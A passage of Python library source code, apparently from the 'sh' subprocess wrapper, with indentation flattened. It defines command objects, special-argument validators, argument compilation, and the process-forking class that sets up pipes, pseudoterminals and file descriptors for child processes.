return int(str(self).strip())
def output_redirect_is_filename(out):
return isinstance(out, basestring)
def get_prepend_stack():
tl = Command.thread_local
if not hasattr(tl, "_prepend_stack"):
tl._prepend_stack = []
return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
s1 = set(passed_kwargs.keys())
invalid_args = []
for args in invalid_list:
if callable(args):
fn = args
ret = fn(passed_kwargs, merged_kwargs)
invalid_args.extend(ret)
else:
args, error_msg = args
if s1.issuperset(args):
invalid_args.append((args, error_msg))
return invalid_args
def get_fileno(ob):
# in py2, this will return None. in py3, it will return an method that
# raises when called
fileno_meth = getattr(ob, "fileno", None)
fileno = None
if fileno_meth:
# py3 StringIO objects will report a fileno, but calling it will raise
# an exception
try:
fileno = fileno_meth()
except UnsupportedOperation:
pass
elif isinstance(ob, (int,long)) and ob >= 0:
fileno = ob
return fileno
def ob_is_fd_based(ob):
return get_fileno(ob) is not None
def ob_is_tty(ob):
""" checks if an object (like a file-like object) is a tty. """
fileno = get_fileno(ob)
is_tty = False
if fileno is not None:
is_tty = os.isatty(fileno)
return is_tty
def ob_is_pipe(ob):
fileno = get_fileno(ob)
is_pipe = False
if fileno:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
# here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
# work, without understanding what they do
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty, std in pairs:
if tty in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
args = (tty, std)
error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty)
invalid.append((args, error))
# if unify_ttys is set, then both tty_in and tty_out must both be True
if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
invalid.append((("unify_ttys", "tty_in", "tty_out"),
"`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"))
return invalid
def fg_validator(passed_kwargs, merged_kwargs):
""" fg is not valid with basically every other option """
invalid = []
msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
whitelist = set(("env", "fg", "cwd"))
offending = set(passed_kwargs.keys()) - whitelist
if "fg" in passed_kwargs and passed_kwargs["fg"] and offending:
invalid.append(("fg", msg))
return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'd to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = passed_kwargs.get("in", None)
out_ob = passed_kwargs.get("out", None)
in_buf = passed_kwargs.get("in_bufsize", None)
out_buf = passed_kwargs.get("out_bufsize", None)
in_no_buf = ob_is_fd_based(in_ob)
out_no_buf = ob_is_fd_based(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(passed_kwargs, merged_kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = passed_kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, dict):
invalid.append(("env", "env must be a dict. Got {!r}".format(env)))
return invalid
for k, v in passed_kwargs["env"].items():
if not isinstance(k, str):
invalid.append(("env", "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
# the amount of time to sleep between polling for the iter output queue
"iter_poll_time": 0.1,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"unify_ttys": False,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
fg_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = getattr(name)
elif name == "bake":
val = getattr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = getattr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the execd command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
merged_args = Command._call_args.copy()
merged_args.update(call_args)
invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for args, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (args, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix",
self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# execd
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"],
call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
if call_args["env"] is None:
launch = lambda: os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
cwd = call_args["cwd"] or os.getcwd()
with pushd(cwd):
exit_code = launch()
exc_class = get_exc_exit_code_would_raise(exit_code,
call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(args, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and compose them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
eessentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
def _start_daemon_thread(fn, name, exc_queue, *args):
def wrap(*args, **kwargs):
try:
fn(*args, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thrd = threading.Thread(target=wrap, name=name, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr,
call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is dup'd
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know because but what if os.execv has an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except:
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024**2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read,
1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd,
self.stdin, ca["in_bufsize"], ca["encoding"],
ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and \
(tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's filedescriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
